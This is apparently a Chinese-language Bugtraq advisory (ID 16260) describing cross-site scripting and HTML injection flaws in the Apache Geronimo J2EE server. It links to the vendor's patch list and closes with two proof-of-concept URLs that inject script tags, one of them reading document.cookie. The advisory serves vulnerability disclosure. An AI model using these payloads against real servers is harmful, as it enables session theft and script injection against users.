BUGTRAQ ID: 16260
Apache Geronimo是Apache软件基金会的开放源码J2EE服务器。
Apache Geronimo由于没有正确的验证用户输入,导致Geronimo中存在跨站脚本和HTML注入漏洞,远程攻击者可以利用这些漏洞执行任意代码或窃取敏感信息。
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=ASC&sorter/field=priority&pid=10220;jsessionid=7CE607D5AD77C21163B05D8D7FB55C81&fixfor=12310710;jsessionid=7CE607D5AD77C21163B05D8D7FB55C81” target=“_blank”>http://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=true&mode=hide&sorter/order=ASC&sorter/field=priority&pid=10220;jsessionid=7CE607D5AD77C21163B05D8D7FB55C81&fixfor=12310710;jsessionid=7CE607D5AD77C21163B05D8D7FB55C81</a>
http://www.example.com/jsp-examples/cal/cal2.jsp?time="/><script>alert('Gotcha')</script>
http://www.example.com/script-that-dont-has-to-exist.jsp?foobar="/><script>alert(document.cookie)</script>